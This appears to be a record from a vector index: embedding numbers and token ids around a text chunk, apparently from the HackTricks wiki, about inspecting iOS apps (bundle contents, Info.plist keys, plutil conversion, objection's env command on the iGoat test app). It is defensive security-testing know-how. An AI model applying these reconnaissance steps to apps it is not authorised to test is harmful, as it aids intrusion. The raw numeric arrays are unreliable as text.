0.034162700176239014, -0.1396453082561493, -0.7444159388542175, 0.32359039783477783, -0.4968315660953522, -0.15160220861434937, 0.3057510554790497, 0.1409313976764679, 0.2630789279937744, -0.18947118520736694, 0.37217065691947937, -0.47098103165626526, 0.38110989332199097, 0.05460057407617569, 0.7599390149116516, -0.19991137087345123, 0.34320399165153503, -0.8662593960762024, -0.40918540954589844, 0.29337331652641296, -0.21180421113967896, 0.6482073068618774, 0.17220108211040497, -0.738095223903656, -0.8122579455375671, 0.27526330947875977, 0.033153071999549866, -0.2534419894218445, 0.055703286081552505, 0.249101459980011, 0.8143455982208252, -0.411171019077301, -0.06846261769533157, 0.32739773392677307, -0.2640596628189087, -1.0674986839294434, 0.23962721228599548, 0.1873083859682083, 0.6073493361473083, -0.5801215767860413, 0.06477537006139755, 0.639066219329834, -0.3650839030742645, 0.14248508214950562, 0.10812173783779144, 0.28609997034072876, -0.8879578709602356, -0.6582188606262207, 0.08103255182504654, 0.114369697868824, 0.030928542837500572, -0.17042215168476105, -1.0561177730560303, 0.6690957546234131, -0.5166767239570618, -0.30725640058517456, -0.655674934387207, -0.33657708764076233, 1.133891224861145, -0.47046831250190735, 0.18497195839881897, -0.1651480495929718, 0.01483247336000204, 0.011430970393121243, 0.31036362051963806, 0.5793873071670532, -1.022406816482544, 0.08881431072950363, 0.05696305260062218, 0.5129706859588623, 0.41319260001182556, 0.3316803276538849, -0.05649605393409729, 0.31535080075263977, -0.36315086483955383, -0.9787796139717102, -0.16055609285831451, -0.2997261881828308, 0.6178244352340698, 0.06301974505186081, -0.04366862401366234, -0.35007229447364807, -0.1328614354133606, -0.007397935260087252, -0.146046981215477, 0.39665308594703674, 0.9874500632286072, 0.48514798283576965, 0.18890321254730225, -0.3442855775356293, -0.8227110505104065, 0.017894819378852844, -0.03132187947630882, 0.07586618512868881, -0.26835402846336365, 0.4829246401786804, -0.3589119613170624, 0.10647924989461899, 0.1210816502571106, -0.31542229652404785, -0.6517996788024902, 0.8521880507469177, -0.11586999893188477, 0.5110551714897156, -0.5054369568824768, -0.0022139891516417265, -0.23881937563419342, -0.07766058295965195, 0.4283525347709656, 0.37178173661231995, -0.16291925311088562, -0.21985864639282227, -0.28144046664237976, -0.3488353490829468, -0.8008886575698853, 0.04620030149817467, -0.23709788918495178, 0.14376841485500336, -0.736811637878418, -0.7367863655090332, -0.5697131752967834, 0.39021599292755127, 0.5689130425453186, 0.5833964943885803, 0.41047215461730957, 0.530749499797821, 0.415441632270813, 0.4618328809738159, 0.03326214477419853, -0.2633260488510132, 0.1217043399810791, 0.49820342659950256, 1.0158411264419556, -0.30801910161972046, -0.2968827486038208, -0.3627847731113434, -0.3132633566856384, -0.7165285348892212, -0.23819224536418915, -0.22389757633209229, 0.2726854681968689, -0.6318638324737549, -0.30865222215652466, -0.2698981761932373, 0.3655645549297333, -0.6342377662658691, 0.46900349855422974, -0.4277394413948059, 0.47689467668533325, 0.7351902723312378, -0.23737739026546478, -0.3143726587295532, -1.1168724298477173, 0.4256678819656372, 0.39886969327926636, -0.046910014003515244, -0.29257112741470337, -0.5207938551902771, -0.9556400775909424, -0.8592858910560608, 0.5439366698265076, 0.6567583680152893, 0.13295267522335052, 0.44030633568763733, -0.6310127973556519, -0.3538771867752075, 0.9627883434295654, -0.19087129831314087, -0.49676209688186646, -0.28197479248046875, 0.35046982765197754, 0.9304220676422119, 0.08896873146295547, 0.030997665598988533, -0.4000962972640991, 0.7659750580787659, -1.058651089668274, 0.7273053526878357, -0.5085644125938416, -0.37570294737815857, 0.45711615681648254, 0.186070054769516, -0.08572055399417877, 0.5574477910995483, -0.6224295496940613, 0.6229150295257568, 0.031300175935029984, 0.42560917139053345, -0.25570276379585266, -0.4283303916454315, 0.8290539383888245, 0.13375529646873474, -0.6992326974868774, 0.35396453738212585, 0.4104573130607605, 0.15296189486980438, 0.46549561619758606, -0.34165480732917786, -0.2687162756919861, 0.734510064125061, -0.7368692755699158, 0.46700429916381836, 0.1337624490261078, -0.17315557599067688, -0.2800789177417755, -0.7494299411773682, 0.21818120777606964, -0.05291719362139702, 0.46967196464538574, -0.9742316603660583, -0.7925929427146912, -0.12877874076366425, -0.18639500439167023, -0.29223963618278503, 0.8662383556365967, -0.3036590814590454, 0.030057013034820557, -0.2536499798297882, -0.16977588832378387, -0.8539261817932129, -0.8349583148956299, 0.043554361909627914, -0.07244979590177536, -0.29909852147102356, -0.4991570711135864, 0.2715775966644287, -0.3256039619445801, 0.19352370500564575, 0.2777612507343292, 0.2533445954322815, -0.09285171329975128, -0.4733975827693939, 0.03969956561923027, 0.22815217077732086, 0.19475604593753815, -0.33878761529922485, 0.5553885102272034, 0.3139854073524475, -0.028428474441170692, 0.4377572238445282, 0.34659773111343384, -0.0917174369096756, -0.18340370059013367, -1.0264246463775635, 0.6239853501319885, 0.17414911091327667, -0.262827068567276, -0.14666959643363953, 0.27272358536720276, -0.37410208582878113, 0.24238677322864532, 0.07033970206975937, -0.8045886754989624, -0.5472273230552673, -0.6548224091529846, 0.3983596861362457, -0.4699605107307434, -0.01675373688340187, -0.4295491576194763, -0.5938684940338135, -0.3229386806488037, 0.37406712770462036, 0.10606066882610321, -0.3101555407047272, -0.2554439306259155, -0.30691856145858765, 0.0396275594830513, 0.12068942189216614, 0.011461075395345688, -0.2057814598083496, -0.5444034934043884, 0.06727679818868637, 0.6886778473854065, 0.27472105622291565, -0.17594660818576813, 0.03533370420336723, 0.5911527872085571, 0.48629409074783325, -0.4507516920566559, -0.49484023451805115, -0.7343133091926575, -0.3571417033672333, -0.11505872756242752, -0.22982114553451538, 0.8111733198165894, -0.18873977661132812, 0.23396600782871246, -0.31266623735427856, -0.0635758563876152, 0.27592241764068604, -0.2893580198287964, -0.37907055020332336, 0.007571866735816002, 1.1237859725952148, -0.5789483189582825, -0.5518300533294678, -0.2646920680999756, 0.9594995379447937, 0.8149807453155518, -0.3350488841533661, -1.156973123550415, -0.13446377217769623, -0.3429033160209656, -1.2700858116149902, 0.3225043714046478, -0.010691659525036812, -0.08625102788209915, -0.21012265980243683, 0.05140587314963341, 0.6002302169799805, -0.422627329826355, -0.013547893613576889, 0.7311785221099854, 0.4412207305431366, -0.30832722783088684, -0.6191672682762146, 0.4980301558971405, -0.16980817914009094, -0.6044303178787231, 0.10607244074344635, -0.34754741191864014, 0.1941765695810318, -0.36785709857940674, -0.34193459153175354, -0.4518010914325714, -0.8141489624977112, 0.23073074221611023, 0.607987642288208, -0.3510321378707886, 0.21830923855304718, 0.5054488778114319, -1.1098121404647827, 0.5671581029891968, 0.57210373878479, -0.2903924584388733, -0.035681720823049545, 0.6677926778793335, 0.4267288148403168, -0.2926903963088989, 0.3403059244155884, 0.36548101902008057, -0.1535770297050476, -0.14737334847450256, 0.17782951891422272, 0.11739018559455872, -0.8479557633399963, 0.32321885228157043, 0.550697386264801, -0.9064401388168335, -0.4799128770828247, 0.2186252474784851, -0.1458025723695755, 0.5780786275863647, -0.5361582636833191, -0.06935453414916992, 0.1373111456632614, -0.6877989172935486, -0.017808593809604645, 0.9382458329200745, -0.014558934606611729, -0.12212830781936646, -0.2297191023826599, 0.7271056175231934, 0.6193061470985413, 0.15223896503448486, 0.7411643266677856, -0.987660825252533, -0.2795044183731079, -0.6664215326309204, -0.45825621485710144, -0.1783975511789322, -0.24154333770275116, 1.2446247339248657, 0.1952815055847168, 0.39061710238456726, 0.44180744886398315, 0.19187700748443604, 0.2664490342140198, -0.13852694630622864, 0.027681486681103706, 0.7717914581298828, 0.12021875381469727, -1.3251250982284546, -0.7743566036224365, 0.3397551476955414, 0.6007269024848938, 0.022596418857574463, -0.4287393391132355, -0.038241200149059296, -0.023168059065937996, -0.014305057004094124, -0.18424628674983978, -0.8915129899978638, -1.2811343669891357, -0.9227629899978638, 0.26760098338127136, 0.3037067949771881, 0.09392907470464706, -0.020459694787859917, 0.6734610199928284, -0.42751920223236084, -0.043160613626241684, -0.13375575840473175, 1.0070219039916992, -0.1908031851053238, 0.13835708796977997, -0.8352851271629333, 0.7060500383377075, -0.40924862027168274, -0.5061712861061096, -0.2519958019256592, 0.12021336704492569, -0.31574034690856934, -0.430409699678421, -0.0861586406826973, -0.14655497670173645, -0.6856010556221008, 0.05241205543279648, -0.6586422920227051, -0.03298839554190636, 0.031730495393276215, -0.6364177465438843, 0.26812660694122314, 0.7642797827720642, -0.7735419869422913, 0.7926769852638245, 0.00809639971703291, 0.29357191920280457, 0.1519794911146164, -0.5854913592338562, 0.26256126165390015, -0.27197369933128357, 0.15499532222747803, 0.1957622766494751, 0.013971415348351002, -0.14909929037094116, -0.7729963660240173, -0.002439166186377406, -0.40275511145591736, -0.21232740581035614, -0.5261020064353943, -0.13462606072425842, -0.28814253211021423, -0.4315170347690582, -0.5879061818122864, 1.0795000791549683, -0.12086154520511627, 0.727028489112854, -0.700645387172699, 0.5875203609466553, 0.05101015791296959, 0.15903876721858978, 0.08756015449762344, 0.457152783870697, 0.40062201023101807, -0.33301177620887756, -0.4722365140914917, 0.5265137553215027, -0.6189575791358948, 0.004820709116756916, -0.0989144891500473, -0.42344850301742554, -0.5366990566253662, 0.17601284384727478, 0.4866601228713989, 0.6116951704025269, 0.6176509261131287, 0.29706528782844543, 0.5249923467636108, -0.2446719855070114, -0.5605244040489197, 0.4002710282802582, -0.7846198678016663, -0.5737013816833496, 0.2808828353881836, 0.0992937684059143, 0.06743902713060379, 0.2710045278072357, 0.0047922502271831036, -0.028126686811447144, -0.01230850163847208, -0.4512559771537781, 0.34285467863082886, 0.10311032086610794, -0.15418949723243713, 0.5688655376434326, -0.4578498601913452, -0.4697515666484833, 0.09937236458063126, 0.08635000884532928, -0.21328306198120117, -0.7106720805168152, 0.4618799388408661, 0.6657698750495911, 0.5208907723426819, -0.3552968502044678, -0.7314614057540894, 0.0992823913693428, -0.00039353405009023845, 0.08156862109899521, 0.6684502363204956, 0.3274470269680023, -0.8553327918052673, 0.6622763276100159, -0.38682302832603455, 0.6317884922027588, -0.3664466142654419, 0.34168779850006104, 0.4128972887992859, -0.1838400959968567, -0.5403489470481873, 0.21570104360580444, 0.2754283845424652, 0.3730267584323883, 0.42589327692985535, 0.05383487418293953, 0.752952516078949, -0.38415682315826416, -0.5221763253211975, 0.35323989391326904, 0.6644574999809265, 0.5904591083526611, 0.14603856205940247, 0.08942274749279022, 0.6523510217666626, 0.7991470098495483, -0.35581496357917786, 0.2595381438732147, 0.1564393937587738, -0.3077211081981659, 0.31312331557273865, -0.2411370724439621, -0.09655843675136566, -0.1456349641084671, 0.2248338907957077, -0.7652572393417358, 0.05067375302314758, -0.7913642525672913, -0.43379664421081543, 0.33136942982673645, -0.02572203241288662, 0.7007165551185608, -0.8974299430847168, 0.49783387780189514, -0.037346333265304565, -0.04497190937399864, 0.03857019916176796, -0.4227953553199768, -0.32066553831100464, 0.16585078835487366, 0.6750581860542297, 0.07953045517206192, -0.7715524435043335, 0.613523542881012, -0.14556920528411865, 0.5021572113037109, 0.3273327350616455, -0.5487127304077148, -0.1347302794456482, 0.24817845225334167, 0.3447948098182678, -0.09896782040596008, -0.5511204600334167, 0.26827874779701233, 0.5190498232841492, 0.09670215100049973, 0.7647580504417419, -0.8052984476089478, -0.17738217115402222, -0.8428173661231995, 0.6882460117340088, -0.38025590777397156, 0.2682282328605652, 0.6980254650115967, -1.0145478248596191, -0.9292379021644592, 0.6027401685714722, 0.4137626588344574, 0.40924420952796936, 0.00637869443744421, 0.9314590096473694, 0.43710213899612427, 1.227573275566101, 0.13986986875534058, 0.28611016273498535, -0.09312096238136292, -0.48953765630722046, -0.006665607914328575, -0.5279577970504761, -0.1445738524198532, -0.08786758780479431, 1.0486302375793457, -0.1075161024928093, -0.36452731490135193, -0.8372095823287964, 0.008984522894024849, -0.4015240967273712, -0.48246338963508606, 0.06832797080278397, 0.2635040283203125, -0.35641127824783325, -0.2505609393119812, 0.08769340813159943, -0.08391911536455154, 0.47265949845314026, -0.03612596541643143, -0.4119875133037567, 0.05110028386116028, 0.10504915565252304, -0.17165608704090118, 0.9365519285202026, -0.49558934569358826, -0.09744666516780853, 0.03555278107523918, -0.6739125847816467, -0.5108776092529297, -0.23806490004062653, 0.03126133978366852, -0.7589007616043091, 0.38575607538223267, 0.17432019114494324, 0.2752082347869873, 0.45486781001091003, -0.6891951560974121, -0.25828641653060913, -0.1346566081047058, 0.5988986492156982, -0.2716490924358368, 0.9414035081863403, 0.5161150693893433, 0.23840439319610596, 0.29868969321250916, 0.08482952415943146, -0.5772111415863037, -0.06707244366407394, 0.15139493346214294, 0.27370864152908325, 0.06485043466091156, -0.6485949754714966, -0.22491507232189178, -0.03135339543223381, 0.32055118680000305, -0.08386601507663727, 0.28718745708465576, -1.367836594581604, 0.3053797781467438, -0.7358431816101074, 0.4409749507904053, -0.12287122756242752, -0.2406749129295349, -0.10436604917049408, 0.06493234634399414, 0.7476062178611755, -1.2571266889572144, 4.3288350105285645, 0.5482343435287476, -0.45359697937965393, 0.3133922219276428, 0.4433738589286804, -0.0993959978222847, 1.0237011909484863, -1.178362250328064, 0.30493050813674927, -0.1848808377981186, 0.28329232335090637, -0.9480661153793335, 0.6030723452568054, 0.5804781317710876, 0.5067854523658752, 0.6670522689819336, -0.514959990978241, 0.12636759877204895, 0.5198711156845093, -0.6150106191635132, -1.3291025161743164, -0.026630889624357224, -0.11460397392511368, 0.7897794246673584, 0.5231618881225586, 0.06301894783973694, 0.5294255018234253, -0.12333132326602936, 0.15847857296466827, 0.03161801025271416, 0.09917531162500381, -0.41811248660087585, 0.02989874966442585, -0.5091396570205688, -0.4927315413951874, 0.3457765579223633, 0.6971932053565979, -0.5932338237762451, -0.2563633918762207, 0.5751540064811707, -0.38217291235923767, 0.08886875212192535, 0.2031727433204651, 0.22899773716926575, 0.1748029738664627, 0.6155429482460022, -0.640885591506958, 0.1669367551803589, 0.21357515454292297, -0.8768489956855774, 0.6414458155632019, -0.12235458195209503, 0.12129615992307663, 0.3263334631919861, -0.10975471138954163, -0.1240554228425026, 0.15651309490203857, -0.15926991403102875, 0.040774501860141754, -0.3554795980453491, 0.9064010381698608, -0.9091399908065796, -0.2366187870502472, 0.07997497171163559, -0.9120298624038696, 0.2752664089202881, 0.3281119465827942, 0.37517353892326355, 0.33375322818756104, 0.0216467697173357, -0.13292630016803741, -0.10949774086475372, -0.20545342564582825, -0.6489077806472778, 0.6424838304519653, 0.15222549438476562, 0.4231944978237152, -0.1293330192565918, -0.07172837108373642, -0.6612862348556519, -0.45183253288269043, -0.825394868850708, -0.9590222835540771, 0.3448759615421295, 0.8294901251792908, 0.5039901733398438, 0.08690222352743149, -0.8739150762557983, -0.1980777382850647, -0.40339013934135437, 0.24020497500896454, -0.675240159034729, -0.3564333915710449, -0.5347117781639099, 0.30371975898742676 ]
[ 5080, 1010, 2017, 1005, 2222, 2034, 2031, 2000, 3275, 2041, 1996, 6149, 14012, 8909, 4765, 18095, 1997, 1996, 4646, 2017, 2215, 2000, 17908, 1012, 2017, 2064, 2224, 10424, 8524, 1011, 8827, 1011, 25423, 2072, 2000, 2131, 2035, 18726, 1006, 1011, 1037, 1007, 2747, 5361, 1006, 1011, 1045, 1007, 2006, 1996, 4198, 18833, 5080, 1006, 1011, 1057, 1007, 1024, 1002, 10424, 8524, 1011, 8827, 1011, 25423, 2072, 14255, 2094, 2171, 8909, 4765, 18095, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 6273, 22610, 8094, 4012, 1012, 6207, 1012, 4684, 9289, 2575, 2620, 16068, 5653, 4012, 1012, 6207, 1012, 4684, 21397, 1011, 10439, 3573, 4012, 1012, 6207, 1012, 18726, 19277, 1011, 6207, 3573, 4012, 1012, 6207, 1012, 3573, 1012, 22193, 1011, 10250, 19879, 4263, 4012, 1012, 6207, 1012, 10250, 19879, 4263, 1011, 4950, 4012, 1012, 6207, 1012, 4950, 1011, 1045, 3995, 4017, 1011, 9170, 27593, 3022, 2361, 1012, 1045, 3995, 4017, 1011, 9170, 22083, 2594, 4372, 17897, 8156, 1004, 8103, 2075, 19738, 6826, 2129, 2000, 4372, 17897, 11657, 1996, 6177, 1997, 1996, 4646, 1998, 2129, 2000, 4089, 8103, 4725, 1998, 4280, 2007, 22224, 1024, 16380, 8103, 2075, 2007, 22224, 11514, 2050, 3252, 1012, 24531, 6764, 2024, 14101, 5669, 14555, 1010, 2061, 2017, 2064, 2689, 1996, 5331, 2000, 1012, 14101, 1998, 21933, 8737, 8303, 2068, 1012, 1037, 3143, 21972, 10439, 3201, 2000, 2022, 5361, 2003, 4141, 3615, 2000, 2004, 1037, 14012, 1012, 2044, 21933, 8737, 8303, 2075, 2068, 2017, 2323, 2156, 1026, 2171, 1028, 1012, 10439, 1010, 1037, 14101, 5669, 8756, 2008, 3397, 1996, 2717, 1997, 1996, 4219, 1012, 18558, 1012, 20228, 2923, 1024, 1037, 5371, 2008, 3397, 2070, 1997, 1996, 4646, 3563, 22354, 1012, 1035, 9537, 23773, 4017, 5397, 1013, 3397, 1037, 20228, 2923, 5371, 2007, 1037, 8085, 2058, 2035, 6764, 1999, 1996, 14012, 1012, 7045, 1012, 2482, 1024, 2178, 14101, 5669, 8756, 2008, 3397, 7045, 1006, 18407, 1007, 1012, 7705, 2015, 1013, 3397, 1996, 10439, 3128, 8860, 2004, 1012, 1040, 8516, 12322, 2030, 1012, 7705, 6764, 1012, 13354, 7076, 1013, 2089, 5383, 10439, 14305, 2004, 1012, 10439, 10288, 6764, 1006, 2025, 2556, 1999, 1996, 2742, 1007, 1012, 4563, 2951, 1024, 2009, 2003, 2109, 2000, 3828, 2115, 4646, 1521, 1055, 4568, 2951, 2005, 2125, 4179, 2224, 1010, 2000, 17053, 5741, 2951, 1010, 1998, 2000, 5587, 25672, 15380, 2000, 2115, 10439, 2006, 1037, 2309, 5080, 1012, 2000, 26351, 2951, 2408, 3674, 5733, 1999, 1037, 2309, 24582, 23743, 2094, 4070, 1010, 4563, 2951, 8073, 13536, 2115, 8040, 28433, 2000, 1037, 6112, 23615, 11661, 1012, 1052, 2243, 11528, 14876, 1024, 1996, 1052, 2243, 11528, 14876, 5371, 2003, 2019, 6585, 2126, 2000, 20648, 1996, 2828, 1998, 8543, 9537, 1997, 2115, 4646, 2030, 14012, 1012, 4372, 1012, 6948, 3217, 3501, 1010, 10424, 1012, 4013, 3501, 1010, 2918, 1012, 6948, 3217, 3501, 1024, 2024 ]
hack_tricks
43.txt
2
the language packs that contains resources for those specific languages, and a default resource in case a language isn't supported. there are multiple ways to define the ui in an ios application : storyboard, nib or xib files. info. plistthe information property list or info. plist is the main source of information for an ios app. it consists of a structured file containing key - value pairs describing essential configuration information about the app. actually, all bundled executables ( app extensions, frameworks and apps ) are expected to have an info. plist file. you can find all possible keys in the apple developer documentation. the file might be formatted in xml or binary ( bplist ). you can convert it to xml format with one simple command : on macos with plutil, which is a tool that comes natively with macos 10. 2 and above versions ( no official online documentation is currently available ) : $ plutil - convert xml1 info. pliston linux : $ apt install libplist - utils $ plistutil - i info. plist - o info _ xml. plisthere's a non - exhaustive list of some info and the corresponding keywords that you can easily search for in the info. plist file by just inspecting the file or by using grep - i < keyword > info. plist : app permissions purpose strings : usagedescriptioncustom url schemes : cfbundleurltypesexported / imported custom document types : utexportedtypedeclarations / utimportedtypedeclarationsapp transport security ( ats ) configuration : nsapptransportsecurityplease refer to the mentioned chapters to learn more about how to test each of these points. data pathson ios, system applications can be found in the / applications directory while user - installed apps are available under / private / var / containers /. however, finding the right folder just by navigating the file system is not a trivial task as every app gets a random 128 - bit uuid ( universal unique identifier ) assigned for its directory names. in order to easily obtain the installation directory information for user - installed apps you can use objection's command env will also show you all the directory information of the app : owasp. igoat - swift on ( iphone : 11. 1. 2 ) [ usb ] # envname path - - -
[ -0.15160644054412842, -0.6419962048530579, -0.013469204306602478, 0.3347827196121216, -0.4403451979160309, -0.177913099527359, 0.3568245470523834, -0.2497548609972, 0.6418560743331909, 0.5249897837638855, 0.20236147940158844, -0.3521988093852997, -0.011446043848991394, -0.3663792312145233, -0.2384544163942337, -0.3080807626247406, -0.5710461735725403, 0.16943131387233734, -1.034000277519226, -0.042933233082294464, -0.03903671354055405, 0.5210331678390503, -1.1157143115997314, -0.5217781066894531, -0.08193006366491318, 0.5857574343681335, 0.7682967782020569, 0.42547452449798584, 0.7264447808265686, 0.7883831262588501, -0.35390493273735046, 0.7663378715515137, -0.22230133414268494, -0.03027450665831566, 0.37749427556991577, -0.3521980345249176, 0.8509569764137268, -0.39253565669059753, 0.31142961978912354, -0.9061876535415649, 0.3804178535938263, -0.3108060657978058, 0.24369189143180847, -0.7246012091636658, -0.3635406792163849, -0.5379300713539124, 0.38780152797698975, -0.6492868661880493, 0.6005380749702454, 0.2387458086013794, 0.6239951252937317, 0.12915904819965363, 0.009742578491568565, -0.17268802225589752, 0.2091073840856552, -0.06355961412191391, 0.11919305473566055, -0.19535791873931885, -0.4401611089706421, 0.5157405734062195, -0.17194774746894836, 0.19068406522274017, -0.010184910148382187, -0.7810531258583069, -0.2326561063528061, 0.08424081653356552, -0.034608833491802216, 0.11551385372877121, -0.38668543100357056, -0.4524138569831848, -0.3988678455352783, 0.9044253826141357, -0.7977721095085144, -0.8998605608940125, -0.4513239562511444, -0.4122553765773773, 0.3327059745788574, -0.396755576133728, 0.1265050172805786, 0.51617032289505, 0.15458202362060547, 0.9074405431747437, 0.4388599097728729, -0.4591898024082184, -0.22229747474193573, 0.11759592592716217, 0.403667688369751, 0.550755500793457, -0.7292787432670593, 0.1813797950744629, 0.23092040419578552, 0.3677334785461426, -1.1493717432022095, -0.5163670778274536, 0.27143558859825134, 0.6709374785423279, -0.23688450455665588, -0.19241808354854584, -0.47216713428497314, -0.7045723795890808, 1.2097991704940796, 0.5941911935806274, 0.24617807567119598, 0.4313395619392395, -0.27716121077537537, 0.17683368921279907, 0.3639847934246063, -0.4751337170600891, -0.2105552852153778, -0.08417091518640518, 0.421967089176178, 0.07200861722230911, 0.08846776932477951, -0.9942170977592468, -0.16150175034999847, 0.012003048323094845, 0.5440982580184937, 0.2417699098587036, -0.36493951082229614, 0.7883713245391846, -0.3386675715446472, -0.2854745388031006, 0.24561607837677002, -0.36924654245376587, -0.10165200382471085, 0.3635426163673401, 0.08741172403097153, 0.9227307438850403, -0.4553459584712982, 0.09037511795759201, -0.08280637860298157, -0.3619801700115204, 0.23714874684810638, 1.3460067510604858, -0.9060110449790955, 0.6474253535270691, 0.23789359629154205, 0.0859440490603447, 0.28801438212394714, -1.1135472059249878, -0.3457708954811096, 0.10824788361787796, -0.0009532568510621786, 0.8876241445541382, 0.35380178689956665, -0.1876993626356125, -0.4561135768890381, -0.5383840799331665, 0.013078795745968819, 0.19807091355323792, 0.04753429442644119, 0.34050217270851135, 0.7579311728477478, -0.07222738862037659, -0.6542704701423645, 0.7933555245399475, -0.6020863652229309, 0.317444771528244, -0.24588702619075775, -0.13654275238513947, -0.376361608505249, 0.44766926765441895, 0.4345698356628418, 0.1494215428829193, -0.3556978702545166, 0.18371085822582245, -0.9183238744735718, -0.27940696477890015, -0.03678597882390022, 0.4200776219367981, 0.04788697510957718, 0.03609543666243553, 0.26410290598869324, 0.14269018173217773, 1.2144849300384521, 0.8459243178367615, -0.30993255972862244, 0.31772416830062866, -0.012751801870763302, 0.8615332841873169, -0.23427879810333252, -0.017773503437638283, 0.18230915069580078, 0.3837789297103882, -0.1858716756105423, 0.3533020615577698, -0.6037659645080566, -0.9080850481987, -0.2431672066450119, -0.5665493607521057, -0.8113682270050049, 0.8748664259910583, -0.22906364500522614, 0.8413399457931519, 0.5033738613128662, 0.16628825664520264, -1.2816736698150635, -0.4556160271167755, -0.0284542478621006, -1.395095944404602, -0.7692142128944397, -0.07859653979539871, 0.48887038230895996, 0.2722495496273041, -0.8486136794090271, -0.28627151250839233, 0.3963882625102997, 0.6343927979469299, -0.22614037990570068, 0.9093434810638428, 1.0011720657348633, -0.48173925280570984, -0.9548738598823547, -0.12515117228031158, 0.4056146442890167, -0.5281791090965271, 0.2620793581008911, 0.6775773167610168, -0.3758838474750519, -0.07354994118213654, -0.13414639234542847, 0.6840492486953735, 0.7518084645271301, 0.022724691778421402, -0.18116456270217896, -0.2927592396736145, 0.21476958692073822, 0.373953640460968, -0.7627571821212769, -0.21257013082504272, 0.15866971015930176, 0.528097927570343, 0.49915826320648193, 1.0727790594100952, 0.315179705619812, -0.25834256410598755, 0.24177035689353943, 0.2332487553358078, -0.11049535870552063, -0.21438880264759064, 0.26647526025772095, 0.9776940941810608, 0.13637463748455048, 0.2693813741207123, 1.0355058908462524, 0.16134034097194672, 0.19238390028476715, -0.29448816180229187, 0.6459170579910278, 0.480374813079834, -0.14794445037841797, 0.8793537616729736, 0.7450076341629028, -0.26051416993141174, -0.6414956450462341, -0.4718729555606842, 0.4833845794200897, 0.570271372795105, -0.4638182818889618, -0.8485233783721924, -0.4473606050014496, -0.23413389921188354, 0.09909341484308243, 0.09082324802875519, -0.5310266017913818, 0.6706854701042175, -0.6049760580062866, 0.4759490191936493, -0.7051515579223633, -0.7862817645072937, -0.7543804049491882, 0.2265881896018982, -0.9463537931442261, -0.14972944557666779, -0.48736366629600525, -0.2267003357410431, 0.021289601922035217, -0.47690704464912415, 0.9323287606239319, -0.6114941835403442, -0.3510621190071106, 0.6298983097076416, 0.2179318219423294, 0.3413988947868347, -0.3418314456939697, -0.06405076384544373, -0.6067336797714233, 0.5677677392959595, 0.345245361328125, 1.0191144943237305, 0.2570858597755432, -0.25525692105293274, -0.7949325442314148, -0.18246755003929138, 0.23523935675621033, -0.28508856892585754, 0.6967127323150635, 0.5993618965148926, -0.059124257415533066, -0.16697564721107483, 0.267111599445343, -0.36155256628990173, 0.4415249526500702, 0.07657099515199661, -0.4597114324569702, 0.9185622930526733, -0.12937818467617035, 0.1867162585258484, 0.24673549830913544, 0.3298446834087372, -0.7078940272331238, 0.2806195020675659, 0.20535142719745636, 0.6663050055503845, -0.12156360596418381, 0.025521650910377502, 0.45577582716941833, 0.008112936280667782, -0.0951048731803894, -0.3936551809310913, 0.21750688552856445, -0.7875508666038513, -0.15076576173305511, -0.0020759522449225187, 0.4613391160964966, -0.06599435210227966, -0.3236181139945984, -0.9411413073539734, 0.29693204164505005, -0.5573592185974121, -0.21628551185131073, -0.12390363216400146, -0.14896006882190704, 0.836218535900116, -0.2703682482242584, -0.022327808663249016, -0.028423277661204338, -0.37714746594429016, 0.445871502161026, 0.4068025052547455, 0.08794105052947998, -0.4709019362926483, 0.5667661428451538, 0.15993493795394897, -0.2931998372077942, 0.550646185874939, -0.02904229797422886, -0.23610249161720276, 0.2773315906524658, -0.6045069694519043, -0.26753202080726624, -0.14897151291370392, -0.15495915710926056, 0.1762266457080841, 0.033335696905851364, 0.4422888457775116, -0.31042444705963135, -0.29455509781837463, -0.0610712468624115, 0.355051726102829, 0.07183582335710526, 0.0010556941851973534, 0.17463573813438416, 0.3603965938091278, 0.21566976606845856, -0.03620298579335213, -0.3898666203022003, 0.38370364904403687, 0.32729679346084595, 0.10203447192907333, 0.851130485534668, 0.02463635616004467, 0.08482976257801056, 0.6696523427963257, -0.2177528291940689, -1.125607967376709, 0.7090929746627808, 0.5237648487091064, 0.5085762143135071, -0.5897993445396423, 0.14149925112724304, 0.0002967563341371715, 0.15951277315616608, 0.4125734865665436, 0.27406802773475647, -0.20217251777648926, -0.6915354132652283, -0.5290918946266174, -0.061203908175230026, -0.6684682369232178, 0.13974598050117493, 0.23231816291809082, 0.33798956871032715, -0.15967610478401184, -0.4612594246864319, -0.9425501227378845, 0.40771254897117615, 1.1060171127319336, 0.6769011616706848, 0.38510534167289734, 0.9233196973800659, 0.19647900760173798, -0.33199673891067505, 0.18708518147468567, -0.9157238006591797, 0.19065597653388977, 0.1386387050151825, 0.9611240029335022, -0.8084988594055176, -0.07395901530981064, -0.16582928597927094, -0.388794869184494, -0.17855405807495117, 0.18869397044181824, -0.04190859943628311, 0.47763895988464355, -0.3651731312274933, -0.5947276949882507, 0.2852877378463745, 0.03322013095021248, -0.58905029296875, 0.001906674588099122, -0.5117711424827576, 0.676945149898529, 0.5595837831497192, -0.11251401901245117, -0.23400795459747314, -0.4091989994049072, -0.2796155512332916, -0.3557049036026001, 0.049229204654693604, -0.16490672528743744, -0.42463260889053345, -0.23867611587047577, -0.7772374153137207, 0.12757685780525208, 0.8220232725143433, 0.17750747501850128, 0.18418845534324646, -1.198254108428955, -0.15707597136497498, 0.8630079030990601, -0.3994240164756775, -0.3147442042827606, -0.057597577571868896, -0.25043389201164246, 0.4886232316493988, 0.21749457716941833, 0.022672243416309357, 0.08234336972236633, 0.30312007665634155, -0.6981319785118103, 0.6219409704208374, -0.8182687759399414, -0.15698444843292236, 0.1646355539560318, -0.06591883301734924, -0.34819838404655457, 0.05151767283678055, -0.7857857346534729, 0.3878253102302551, 0.26231953501701355, 0.3143913149833679, -0.17966371774673462, -0.01759130135178566, 0.618821918964386, -0.6702971458435059, -0.5112234950065613, 0.2634199559688568, 0.4874609112739563, 0.06799419969320297, 0.15516313910484314, -0.7153920531272888, -0.40863534808158875, 0.7791546583175659, -0.7446735501289368, 0.6733949184417725, -0.1474633365869522, -0.34987524151802063, -0.32188141345977783, -0.39732375741004944, 0.6128252148628235, 